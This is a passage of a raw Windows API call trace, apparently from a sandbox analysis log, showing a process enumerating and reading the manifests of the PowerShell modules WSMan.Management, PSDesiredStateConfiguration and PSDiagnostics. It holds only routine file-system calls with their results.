lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x6e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0153.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.683] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.684] GetFileType (hFile=0x520) returned 0x1 [0153.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.684] GetFileType (hFile=0x520) returned 0x1 [0153.684] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.684] ReadFile (in: hFile=0x520, lpBuffer=0x27a0270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27a0270*, lpNumberOfBytesRead=0x5a0e4c8*=0x2ea, lpOverlapped=0x0) returned 1 [0153.725] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x2ea [0153.725] ReadFile (in: hFile=0x520, lpBuffer=0x27a0270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27a0270*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.725] CloseHandle (hObject=0x520) returned 1 [0153.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0153.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0153.726] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.726] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.726] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e794980, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e794980, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x479, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disable-DscDebug.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x497da680, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSCClassResources", cAlternateFileName="DSCCLA~1")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4971bfa0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSCResources", cAlternateFileName="DSCRES~1")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4971bfa0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x4971bfa0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x4971bfa0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2abc20, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2abc20, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Enable-DscDebug.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911fb160, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911fb160, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x556, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get-DscConfiguration.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91436600, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91436600, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140a5651, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get-DscConfigurationStatus.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911fb160, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x911fb160, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140aa479, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get-DSCLocalConfigurationManager.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fbaa320, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8fbaa320, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16118527, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3f4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e617bc0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e617bc0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16118527, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x13da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.psd1", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9002c0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d9002c0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16224f68, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x30f02, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.psm1", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d23880, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x91d23880, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16224f68, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0xe05, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f4d8a0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90f4d8a0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x173b77b8, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDscXMachine.psm1", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2abc20, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2abc20, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140e9c6c, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x95d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Remove-DscConfigurationDocument.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912df9a0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x912df9a0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140e9c6c, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x452, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-DscConfiguration.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2abc20, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2abc20, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x140eea8f, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x5a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stop-DscConfiguration.cdxml", cAlternateFileName="")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4971bfa0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x4971bfa0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x4971bfa0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebDownloadManager", cAlternateFileName="WEBDOW~1")) returned 1 [0153.727] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.727] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x70 [0153.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x70, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0153.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x70 [0153.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x70, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0153.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.729] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1"), fInfoLevelId=0x0, lpFileInformation=0x27a6c1c | out: lpFileInformation=0x27a6c1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e617bc0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e617bc0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x16118527, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x13da)) returned 1 [0153.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x70 [0153.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x70, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0153.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.729] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.729] GetFileType (hFile=0x520) returned 0x1 [0153.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.729] GetFileType (hFile=0x520) returned 0x1 [0153.730] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.730] ReadFile (in: hFile=0x520, lpBuffer=0x27a7a4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27a7a4c*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0153.779] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x1000 [0153.779] ReadFile (in: hFile=0x520, lpBuffer=0x27a7a4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27a7a4c*, lpNumberOfBytesRead=0x5a0e4c8*=0x3da, lpOverlapped=0x0) returned 1 [0153.848] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x13da [0153.848] ReadFile (in: hFile=0x520, lpBuffer=0x27a7a4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27a7a4c*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.848] CloseHandle (hObject=0x520) returned 1 [0153.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0153.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0153.852] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.852] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.852] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics.psd1", cAlternateFileName="PSDIAG~1.PSD")) returned 1 [0153.852] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8d7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics.psm1", cAlternateFileName="PSDIAG~1.PSM")) returned 1 [0153.852] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8d7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics.psm1", cAlternateFileName="PSDIAG~1.PSM")) returned 0 [0153.852] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.852] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0153.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.853] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x27b3bac | out: lpFileInformation=0x27b3bac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266)) returned 1 [0153.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: 